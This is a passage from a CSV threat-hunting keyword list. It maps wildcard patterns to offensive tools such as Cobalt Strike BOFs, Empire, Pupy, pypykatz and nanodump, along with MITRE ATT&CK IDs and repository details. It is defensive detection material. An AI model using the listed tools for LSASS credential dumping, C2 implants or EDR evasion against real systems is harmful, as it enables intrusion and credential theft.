TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*import metame,offensive_tool_keyword,metame,metame is a metamorphic code engine for arbitrary executables,T1027 - T1059.003 - T1140,TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/a0rtega/metame,1,0,N/A,N/A,6,508,96,2019-10-06T18:24:14Z,2016-08-07T13:56:57Z -*import mythic*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*import np_server*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*import Payload*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*import pe.OBJExecutable*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,0,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*Import powerview*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*import PupyConfig*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*import PyInstaller*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*import pypykatz*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential 
Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*import ShadowForgeHome*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,0,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*import SimpleHTTPServer*,greyware_tool_keyword,simplehttpserver,quick web server in python,T1021.002 - T1059.006,TA0002 - TA0005,N/A,N/A,Data Exfiltration,https://docs.python.org/2/library/simplehttpserver.html,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*import Stager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*import udmp_parser*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,0,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z -*import wapiti*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*import wfuzz*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*import/nessus/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*import/nexpose*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*import_msf_web*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ImportDll::GetAsyncKeyState*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Import-DllImports -PEInfo *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Import-DllImports*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Import-DllInRemoteProcess*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1105,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Import-DllInRemoteProcess*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Import-DllInRemoteProcess*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 function name,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Import-DllInRemoteProcess*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Import-Module *Microsoft.ActiveDirectory.Management.dll*,offensive_tool_keyword,powershell,redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed,T1110.001 - T1110.003 - T1110.004,TA0006,N/A,N/A,Credential Access,https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1,1,0,N/A,N/A,1,91,6,2023-10-01T14:24:00Z,2022-12-05T12:40:02Z -*Inactive Domain Admins Honey Tokens*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*inceptor*POWERSHELL*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*inceptor.py *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense 
Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*inceptor/obfuscators*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*inceptor-main.zip*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*include beacon.h*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,0,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*include injection.c*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 
- T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,0,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*include*bofmask.h*,offensive_tool_keyword,BOFMask,BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF),T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/passthehashbrowns/BOFMask,1,1,N/A,10,1,94,24,2023-06-28T14:35:32Z,2023-06-27T21:19:22Z -*incognito* list_tokens -u*,offensive_tool_keyword,AD exploitation cheat sheet,Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. 
Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*incognito.exe*,offensive_tool_keyword,AD exploitation cheat sheet,Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*incorrect signature*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*infection_monkey.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*info@skelsecprojects.com*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*infoga.py -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*information_gathering_tools.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*infosecn1nja/SharpDoor*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,1,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*Initial_Access.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*InitialAccess_SpearphishingAttachment_FakeWordDoc.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*InitialAccess_SpearphishingAttachment_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical 
intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*initialize_fake_thread_state*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*initialize_spoofed_callstack*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*initializeShellcodeFluctuation*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess 